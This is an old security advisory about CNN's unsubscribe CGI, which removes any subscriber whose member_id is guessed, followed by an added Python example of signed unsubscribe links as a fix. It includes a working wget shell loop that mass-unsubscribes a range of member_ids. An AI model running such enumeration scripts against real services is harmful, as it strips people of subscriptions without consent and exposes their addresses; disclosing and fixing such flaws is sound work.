CNN List Un-Subscribe bot

# Date: 8/22/01
# Author: Jay Daniels <psaux@zdnetonebox.com>


PROBLEM:
Anyone can unsubscribe other users from CNN's distribution list by requesting
the unsubscribe CGI URL with an arbitrary number as its member_id.

CAUSE: There is no confirmation request!  I can't remember if there is a
confirmation request when subscribing; if not, then a similar method could be
used to post/subscribe others without their knowledge.

[example: quicknews]

http://cgi.cnn.com/cgi-bin/quicknews/register1?member_id=3465865

[output]
>User removed
>The email address jay@thecompany.com has been removed from the e-wiretext 
>distribution list(s). This change should take effect within 24 hours.

I do not know the exact range for member_id so you can just start at [start_memid]
and go up.


Now you could make a simple shell script to do this using wget:

#!/bin/sh
# you may want to use a proxy or adjust wget options see %wget -h

# path for wget
path="/usr/bin"


if [ $# != 2 ]; then
  echo "Usage: $0 [start_memid] [stop_memid]"
  exit 1
fi


count=$(($1))

while [ "$count" -le "$2" ]; do
  $path/wget -a $0.log http://cgi.cnn.com/cgi-bin/quicknews/register1?member_id=$count
  count=$(($count + 1))
done

exit 0
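
One way to supply the check that CAUSE says is missing, as an added example (not part of the original advisory and not CNN's code): the unsubscribe link carries an HMAC bound to the member_id and its address, so a guessed member_id is refused and the reply no longer echoes the address. The key, link lifetime, reply text and function names are assumptions.

```python
import base64
import hashlib
import hmac
import time
from urllib.parse import parse_qs, urlencode

# Assumptions (not from the advisory): key, lifetime, reply text, function names.
SECRET_KEY = b"constructed-demo-key"  # server-side only; load from a secret store
LINK_TTL = 7 * 24 * 3600              # signed links expire after 7 days
GENERIC_REPLY = "If this link was valid, the address has been removed."

def _signature(member_id, email, expires):
    """HMAC-SHA256 over the id, the address it belongs to, and the expiry."""
    msg = f"{member_id}|{email.lower()}|{expires}".encode()
    digest = hmac.new(SECRET_KEY, msg, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode()

def make_unsubscribe_query(member_id, email, now=None):
    """Query string for the footer link of mail sent to this one subscriber."""
    expires = int(time.time() if now is None else now) + LINK_TTL
    return urlencode({"member_id": member_id, "expires": expires,
                      "sig": _signature(member_id, email, expires)})

def handle_unsubscribe(query, members, now=None):
    """Return (removed, reply). The reply is the same for every outcome and
    never echoes the address, so a guessed member_id neither removes anyone
    nor reveals who owns it."""
    now = int(time.time() if now is None else now)
    fields = {k: v[0] for k, v in parse_qs(query).items()}
    try:
        member_id = int(fields["member_id"])
        expires = int(fields["expires"])
        sig = fields["sig"].encode()
    except (KeyError, ValueError):
        return False, GENERIC_REPLY
    # Always compute and compare, so known and unknown ids take the same path.
    expected = _signature(member_id, members.get(member_id, ""), expires).encode()
    valid = hmac.compare_digest(expected, sig)
    if not (valid and member_id in members and now <= expires):
        return False, GENERIC_REPLY
    del members[member_id]
    return True, GENERIC_REPLY

if __name__ == "__main__":
    # Constructed sample data; the first id and address are those quoted above.
    members = {3465865: "jay@thecompany.com", 3465866: "other@example.com"}
    print(handle_unsubscribe("member_id=3465866", members))      # bare id: refused
    link = make_unsubscribe_query(3465865, "jay@thecompany.com")
    print(handle_unsubscribe(link, members), sorted(members))    # signed: removed
```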